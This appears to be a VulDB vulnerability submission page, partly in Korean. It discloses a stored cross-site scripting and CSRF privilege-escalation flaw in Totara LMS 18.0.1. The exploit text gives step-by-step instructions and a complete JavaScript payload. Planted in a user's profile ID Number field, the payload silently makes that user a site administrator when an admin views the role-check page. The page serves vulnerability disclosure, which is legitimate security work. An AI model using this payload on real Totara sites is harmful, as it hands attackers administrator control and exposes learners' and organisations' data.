제출 #314381: Totara Totara LMS Totara 18.0.1 (Build: 20231128.01) Privileges Scalation정보

제목Totara Totara LMS Totara 18.0.1 (Build: 20231128.01) Privileges Scalation
설명# Exploit Title: CSRF Privileges Scalation Totara 18.0.1 # Date: 2024-04-10 # Author: Patricio Alejandro Moraga Abarca (RREEDD) and Juan Carlos Garcés Bernt (DeBobiPro) # Category : webapps # Tested on: Totara 18.0.1 (Build: 20231128.01) # Proof Of Concept: 1. In your user profile modify the "ID Number" variable by entering the payload. 2. The payload will be executed by the administrator when visiting the site "admin/roles/check.php", making the profile defined in the administrator payload. # Payload <script>const http = new XMLHttpRequest(); http.open("POST", "/admin/roles/admins.php", false); http.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); http.send("confirmadd=<USER ID>&sesskey="+M.cfg.sesskey);</script> #The <USER ID> field must be modified by the value of your user. #The variable "sesskey", is unique to each login, so we get it dynamically with the call to the object "M.cfg.sesskey".
사용자
 Anonymous User
제출2024. 04. 10. PM 07:35 (2 연령 ago)
모더레이션2024. 04. 17. PM 06:58 (7 days later)
상태수락
VulDB 항목261369 [Totara LMS 까지 18.7 User Selector 교차 사이트 요청 위조]
포인트들17

Do you know our Splunk app?

Download it now for free!